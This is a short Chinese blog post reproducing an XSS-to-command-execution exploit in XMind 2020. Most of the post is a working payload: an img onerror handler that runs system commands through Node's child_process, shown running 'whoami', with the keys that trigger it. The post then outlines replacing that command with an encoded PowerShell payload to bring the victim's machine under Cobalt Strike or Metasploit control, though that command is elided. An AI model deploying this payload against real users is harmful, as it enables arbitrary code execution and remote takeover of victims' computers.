本文介绍了一个存在于XMind 2020版本中的XSS漏洞,该漏洞允许攻击者通过精心构造的payload执行任意命令。文章详细展示了如何利用此漏洞执行'whoami'命令,并进一步介绍了如何通过powershell命令实现更复杂的操作。
0x00 前言
测试环境:
XMind 202005082128
0x01 payload(需要在大纲板块进行触发)
<img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})">0x02 触发键
shift
control
option
command
0x03 漏洞复现
1、命令执行
whoami
2、扩展上线CS
XSS执行系统命令,内核V8,上线到CS或者MSF,替换whoami,
通过对powershell进行编码,然后替换payload进行上线CS
payload:
<img src=x onerror="const exec = require('child_process').exec;exec('powershell(……)').stdout.on('data', function (data) {alert(data);})">
转载请注明:Adminxe's Blog » XMind-XSS-V8内核命令执行复现
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
